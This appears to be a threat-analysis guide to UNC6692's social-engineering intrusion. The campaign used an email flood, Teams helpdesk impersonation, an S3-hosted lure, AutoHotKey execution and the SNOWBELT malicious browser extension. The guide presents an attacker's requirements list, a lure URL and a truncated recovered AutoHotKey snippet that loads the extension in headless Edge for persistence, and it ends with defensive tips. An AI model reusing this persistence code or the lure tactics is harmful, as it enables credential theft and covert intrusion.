Deconstructing Snow Flurries: A Step-by-Step Breakdown of UNC6692's Social Engineering Attack
Introduction
In late December 2025, the threat group UNC6692 executed a sophisticated, multi-stage intrusion campaign that combined relentless social engineering, custom malware, and a malicious browser extension. This guide dissects each phase of their attack—from the initial email flood to establishing persistence—so you can understand the mechanics and bolster your defenses. The attackers impersonated IT helpdesk staff, exploited trust in enterprise software, and used a clever AutoHotKey trick to deploy their tools. Follow along to see how each step unfolded.
What You Need (From the Attacker's Perspective)
- A large email distribution list for sending spam or phishing emails to overwhelm the target.
- An external Microsoft Teams account (not part of the victim’s organization) to initiate chat invitations.
- An AWS S3 bucket hosted in the
us-west-2region to host malicious files. - A legitimate AutoHotKey binary (renamed to match a script file) and a custom AutoHotKey script (e.g., for initial reconnaissance and extension installation).
- A malicious Chromium browser extension (not distributed via Chrome Web Store) named SNOWBELT.
- Persistence mechanisms: a Windows Startup folder shortcut and a scheduled task to keep the extension active.
Step-by-Step Attack Breakdown
Step 1: Overwhelm the Target with an Email Campaign
UNC6692 began by bombarding the victim’s inbox with a large volume of emails. This wasn’t a typical phishing blast; the goal was to create urgency and distraction. The sheer number of messages made it hard for the victim to distinguish legitimate communications from noise. This set the stage for the next, more targeted contact.
Step 2: Impersonate IT Helpdesk via Microsoft Teams
Shortly after the email deluge, an attacker using an external Teams account reached out to the victim, posing as helpdesk staff. They offered to help resolve the “email spam problem” the victim was experiencing. The message included a link to what was described as a local patch that would prevent further spamming. The victim, already stressed by the email flood, was more likely to trust this unsolicited help.
Step 3: Deliver the Malicious Link (HTML Page)
The link sent via Teams pointed to an HTML page hosted on the attacker’s AWS S3 bucket:
https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.comThe page displayed a convincing update prompt, such as “Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming.” When the victim clicked, the HTML page initiated a download of two files: a renamed AutoHotKey binary and an AutoHotKey script with the same filename. The binary was named identically to the script so that when executed, AutoHotKey would automatically run the script without needing extra command-line arguments.
Step 4: Execute the AutoHotKey Script for Initial Reconnaissance
Once the victim ran the downloaded file, the AutoHotKey script executed immediately. Mandiant could not recover the original script, but evidence shows it performed initial reconnaissance commands and then proceeded to install the SNOWBELT browser extension. The script also checked if Microsoft Edge was running in headless mode (likely to avoid detection) and ensured persistence mechanisms were in place.
Step 5: Install SNOWBELT – A Malicious Chromium Extension
The script installed the SNOWBELT browser extension into Chromium-based browsers (like Edge). This extension was not available through the Chrome Web Store; it was loaded from a local path. SNOWBELT allowed attackers to monitor browser activity, steal credentials, or perform man-in-the-browser attacks. The extension ran even when the browser was launched in --headless=new mode, making it hard to spot.
Step 6: Establish Persistence via Startup Folder
To ensure SNOWBELT stayed active across reboots, the AutoHotKey script added a shortcut to itself in the Windows Startup folder. This shortcut launched the AutoHotKey script again, which in turn verified that the extension was running and that a scheduled task existed.
Step 7: Schedule a Task for Continuous Monitoring
The script also created a scheduled task that periodically checked if SNOWBELT was still active. If the extension was missing, the task would re-launch it. The code snippet recovered from the campaign shows:
if !CheckHeadlessEdge(){
try{
taskService:=ComObject("Schedule.Service")
taskService.Connect()
rootFolder:=taskService.GetFolder("\")
if FindAndRunTask(rootFolder){
Sleep 10000
if CheckHeadlessEdge(){
ExitApp
}
}
}
Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft
This code launches Microsoft Edge in headless mode with the SNOWBELT extension loaded. The scheduled task and startup shortcut together made removal difficult for the victim.
Tips for Defending Against This Type of Attack
- Train users to verify unsolicited helpdesk contacts. Any IT support request that arrives via external Teams or email should be verified through a separate, trusted channel (e.g., a known internal phone number or in-person visit).
- Implement email filtering rules to detect and quarantine mass email campaigns, even if they don’t contain obvious malicious links.
- Restrict external Teams communication to only allow messages from trusted domains. Consider disabling external chat invitations by default for non-essential roles.
- Monitor for AutoHotKey usage in your environment. Legitimate AutoHotKey scripts are rare in corporate settings; unexpected execution should raise alerts.
- Block sideloaded browser extensions using group policies. Only allow extensions from the official Chrome Web Store or Microsoft Edge Add-ons store.
- Audit scheduled tasks and startup folder entries regularly. Look for unfamiliar tasks or shortcuts that launch scripts or headless browsers.
- Deploy endpoint detection and response (EDR) solutions that can correlate the indicators from this attack chain, such as a spike in emails followed by a Teams message and an AutoHotKey execution.